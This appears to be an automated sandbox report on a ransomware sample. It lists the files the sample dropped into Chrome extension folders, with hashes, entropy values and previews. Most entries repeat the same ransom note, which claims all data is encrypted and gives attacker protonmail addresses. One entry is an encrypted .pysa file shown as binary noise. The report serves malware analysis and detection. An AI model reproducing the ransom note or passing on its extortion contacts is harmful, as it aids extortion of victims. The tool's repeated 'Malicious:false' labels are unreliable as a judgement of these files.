                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\sv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\th\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\tr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\uk\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\vi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_CN\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_TW\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\icon_128.png.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5120
                  Entropy (8bit):7.154784572803144
                  Encrypted:false
                  SSDEEP:96:2dp3hqRwKp5gP5UY+c+KjE0AYUA9ah1+Jd0cBfWstx1C0hZuw7aQN:23CprctE0WAPd9BPth6wl
                  MD5:2F068562F2ADF92F005A5D5456664551
                  SHA1:6975DE7DCD25A1163DC0CE94E99A44B28481F294
                  SHA-256:BB524F92146064C8199EEE9D86D42E8687FAC36FF9BCE88D61FB47A8D321EF00
                  SHA-512:CF34267824D8AD57AED7812A1E387835504F288B2049CCE3CC97E92544F46E67A31FB2DF8B318D73FF3DE15A84B6412F966CF04CCCF3BE6C2144435C398311C7
                  Malicious:false
                  Preview: 0..Mu...W).P.Dy.9..Vl...........bg..7.m.XO...[.....kj._r.6(a.n......4=_.?).......T..U.5..!!..1....+...vPP....KjK....@..*.V.o..........:..n......c...v.[e..23#....Z..n....P....f.]....mR.TYg...*....C..M...G1..V...f....G..u.m.t..u...(....&6..o3*....$..U..a..r.....E..ga.`\r.a.j..=uO ..."..!.....o..q,...=.P....n...@.}m.B.....2..cs...f......Z&N..Z..W..].Z.2k....q............1.....F..7..E.....'O.qk...4.....C6.kJ]n...-,=..XP(....6.77...z..`.5...J.:.8....,.<.S...|...(%Z..I...L1..n.H.......... .vF...6.D.9..<..3....b..!..O.]crH.0c..gPw.!X]..ir........xd..|.;/.idX....L5..[.......*t........u%B..*;(.!.n...aKUj...f..............z..............?A..\..9.d.w2.k..N].}W...cX....6.."$..\k..x6:nL......O.r_W...s..Q7..7..t.Q.`.;..G|..&..2...C.i.&.+r..u..^(....t.....[..\U.*..(:......(.-....0....GS..*.`..R..r..A..7..O..k@.....B.-.'..Y.trY-......Y.c.QB.........'.w..|$$..s.DL..AZ[f..66.V......K.&&.y.p>..a.Q.mF.#.(zn.kD..@M...ed#.^Sf...#.^....66y....H
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ar\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\bg\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ca\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\cs\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\da\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\de\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\el\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_GB\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
